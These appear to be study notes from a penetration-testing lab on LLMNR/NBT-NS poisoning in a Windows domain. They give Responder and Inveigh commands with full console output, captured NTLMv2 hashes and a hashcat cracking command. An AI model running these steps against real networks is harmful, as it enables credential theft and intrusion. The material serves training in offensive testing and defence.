LLMNR/NBT-NS Poisoning

Quick Example

Let's walk through a quick example of the attack flow at a very high level:

1. A host attempts to connect to the print server at \\print01.inlanefreight.local, but accidentally types in \\printer01.inlanefreight.local.

2. The DNS server responds, stating that this host is unknown.

3. The host then broadcasts out to the entire local network asking if anyone knows the location of \\printer01.inlanefreight.local.

4. The attacker (us with Responder running) responds to the host stating that it is the \\printer01.inlanefreight.local that the host is looking for.

5. The host believes this reply and sends an authentication request to the attacker with a username and NTLMv2 password hash.

6. This hash can then be cracked offline or used in an SMB Relay attack if the right conditions exist.

Tools

Tool	Description
Responder	Responder is a purpose-built tool to poison LLMNR, NBT-NS, and MDNS, with many different functions.
Inveigh	Inveigh is a cross-platform MITM platform that can be used for spoofing and poisoning attacks.
Metasploit	Metasploit has several built-in scanners and spoofing modules made to deal with poisoning attacks.

• Both responder and inveigh can attack the following protocols: LLMNR, DNS, MDNS, NBNS, DHCP, ICMP, HTTP, HTTPS, SMB, LDAP, WebDAV, Proxy Auth

• But responder also has support for:

  • MSSQL

  • DCE-RPC

  • FTP, POP3, IMAP, and SMTP auth

Sample Exploitation

Linux

1. Start Responder

   $ sudo responder -I ens224
                                            __
     .----.-----.-----.-----.-----.-----.--|  |.-----.----.
     |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
     |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                      |__|
   
              NBT-NS, LLMNR & MDNS Responder 3.0.6.0
   
     Author: Laurent Gaffie (laurent.gaffie@gmail.com)
     To kill this script hit CTRL-C
   
   
   [+] Poisoners:
       LLMNR                      [ON]
       NBT-NS                     [ON]
       DNS/MDNS                   [ON]
   
   [+] Servers:
       HTTP server                [ON]
       HTTPS server               [ON]
       WPAD proxy                 [OFF]
       Auth proxy                 [OFF]
       SMB server                 [ON]
       Kerberos server            [ON]
       SQL server                 [ON]
       FTP server                 [ON]
       IMAP server                [ON]
       POP3 server                [ON]
       SMTP server                [ON]
       DNS server                 [ON]
       LDAP server                [ON]
       RDP server                 [ON]
       DCE-RPC server             [ON]
       WinRM server               [ON]
   
   [+] HTTP Options:
       Always serving EXE         [OFF]
       Serving EXE                [OFF]
       Serving HTML               [OFF]
       Upstream Proxy             [OFF]
   
   [+] Poisoning Options:
       Analyze Mode               [OFF]
       Force WPAD auth            [OFF]
       Force Basic Auth           [OFF]
       Force LM downgrade         [OFF]
       Fingerprint hosts          [OFF]
   
   [+] Generic Options:
       Responder NIC              [ens224]
       Responder IP               [172.16.5.225]
       Challenge set              [random]
       Don't Respond To Names     ['ISATAP']
   
   [+] Current Session Variables:
       Responder Machine Name     [WIN-72Y80BU39K4]
       Responder Domain Name      [124M.LOCAL]
       Responder DCE-RPC Port     [49109]
   [!] Error starting TCP server on port 3389, check permissions or other servers running.
   
   [+] Listening for events...
   
   [*] [LLMNR]  Poisoned answer sent to 172.16.5.130 for name academy-ea-web0
   [*] [MDNS] Poisoned answer sent to 172.16.5.130    for name academy-ea-web0.local
   [*] [MDNS] Poisoned answer sent to 172.16.5.130    for name academy-ea-web0.local
   [*] [LLMNR]  Poisoned answer sent to 172.16.5.130 for name academy-ea-web0
   [*] [MDNS] Poisoned answer sent to 172.16.5.130    for name academy-ea-web0.local
   [*] [LLMNR]  Poisoned answer sent to 172.16.5.130 for name academy-ea-web0
   [*] [MDNS] Poisoned answer sent to 172.16.5.130    for name academy-ea-web0.local
   [*] [LLMNR]  Poisoned answer sent to 172.16.5.130 for name academy-ea-web0
   [*] [MDNS] Poisoned answer sent to 172.16.5.130    for name academy-ea-web0.local
   [*] [LLMNR]  Poisoned answer sent to 172.16.5.130 for name academy-ea-web0
   [*] Skipping previously captured hash for INLANEFREIGHT\lab_adm
   [SMB] NTLMv2-SSP Client   : 172.16.5.130
   [SMB] NTLMv2-SSP Username : INLANEFREIGHT\backupagent
   [SMB] NTLMv2-SSP Hash     : backupagent::INLANEFREIGHT:63d7f544c395e21e:A0FDD20C576AA5BA6901A4B8E25101F4:010100000000000000558A1501E3D901AE687130E3EBF6FB00000000020008003100320034004D0001001E00570049004E002D003700320059003800300042005500330039004B00340004003400570049004E002D003700320059003800300042005500330039004B0034002E003100320034004D002E004C004F00430041004C00030014003100320034004D002E004C004F00430041004C00050014003100320034004D002E004C004F00430041004C000700080000558A1501E3D9010600040002000000080030003000000000000000000000000030000083E026FD817AC3DDCEFFFEDEE543B62660CE84A9C2C47D025FBB90D92498E24B0A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000

2. Cracking NTLMv2 hash with hashcat

   $ cat hash.txt
   backupagent::INLANEFREIGHT:13409d5f8e108375:471CFF4F43598ED4FECE37551BB9FB24:010100000000000000558A1501E3D90186A5C66E784510EE00000000020008003100320034004D0001001E00570049004E002D003700320059003800300042005500330039004B00340004003400570049004E002D003700320059003800300042005500330039004B0034002E003100320034004D002E004C004F00430041004C00030014003100320034004D002E004C004F00430041004C00050014003100320034004D002E004C004F00430041004C000700080000558A1501E3D9010600040002000000080030003000000000000000000000000030000083E026FD817AC3DDCEFFFEDEE543B62660CE84A9C2C47D025FBB90D92498E24B0A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000
   
   $ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

3. We now have the plaintext password of the user

Windows

1. Start Inveigh

   PS C:\htb> Import-Module .\Inveigh.ps1
   PS C:\htb> Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
   
   [*] Inveigh 1.506 started at 2022-02-28T19:26:30
   [+] Elevated Privilege Mode = Enabled
   [+] Primary IP Address = 172.16.5.25
   [+] Spoofer IP Address = 172.16.5.25
   [+] ADIDNS Spoofer = Disabled
   [+] DNS Spoofer = Enabled
   [+] DNS TTL = 30 Seconds
   [+] LLMNR Spoofer = Enabled
   [+] LLMNR TTL = 30 Seconds
   [+] mDNS Spoofer = Disabled
   [+] NBNS Spoofer For Types 00,20 = Enabled
   [+] NBNS TTL = 165 Seconds
   [+] SMB Capture = Enabled
   [+] HTTP Capture = Enabled
   [+] HTTPS Certificate Issuer = Inveigh
   [+] HTTPS Certificate CN = localhost
   [+] HTTPS Capture = Enabled
   [+] HTTP/HTTPS Authentication = NTLM
   [+] WPAD Authentication = NTLM
   [+] WPAD NTLM Authentication Ignore List = Firefox
   [+] WPAD Response = Enabled
   [+] Kerberos TGT Capture = Disabled
   [+] Machine Account Capture = Disabled
   [+] Console Output = Full
   [+] File Output = Enabled
   [+] Output Directory = C:\Tools
   WARNING: [!] Run Stop-Inveigh to stop
   [*] Press any key to stop console output
   WARNING: [-] [2022-02-28T19:26:31] Error starting HTTP listener
   WARNING: [!] [2022-02-28T19:26:31] Exception calling "Start" with "0" argument(s): "An attempt was made to access a
   socket in a way forbidden by its access permissions" $HTTP_listener.Start()
   [+] [2022-02-28T19:26:31] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled]
   [+] [2022-02-28T19:26:31] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled]
   [+] [2022-02-28T19:26:31] LLMNR request for academy-ea-web0 received from 172.16.5.125 [response sent]
   [+] [2022-02-28T19:26:32] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled]
   [+] [2022-02-28T19:26:32] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled]
   [+] [2022-02-28T19:26:32] LLMNR request for academy-ea-web0 received from 172.16.5.125 [response sent]
   [+] [2022-02-28T19:26:32] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled]
   [+] [2022-02-28T19:26:32] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled]
   [+] [2022-02-28T19:26:32] LLMNR request for academy-ea-web0 received from 172.16.5.125 [response sent]
   [+] [2022-02-28T19:26:33] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled]
   [+] [2022-02-28T19:26:33] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled]
   [+] [2022-02-28T19:26:33] LLMNR request for academy-ea-web0 received from 172.16.5.125 [response sent]
   [+] [2022-02-28T19:26:34] TCP(445) SYN packet detected from 172.16.5.125:56834
   [+] [2022-02-28T19:26:34] SMB(445) negotiation request detected from 172.16.5.125:56834
   [+] [2022-02-28T19:26:34] SMB(445) NTLM challenge 7E3B0E53ADB4AE51 sent to 172.16.5.125:56834

2. Retrieve the Hash and crack it using hashcat as same as the method in linux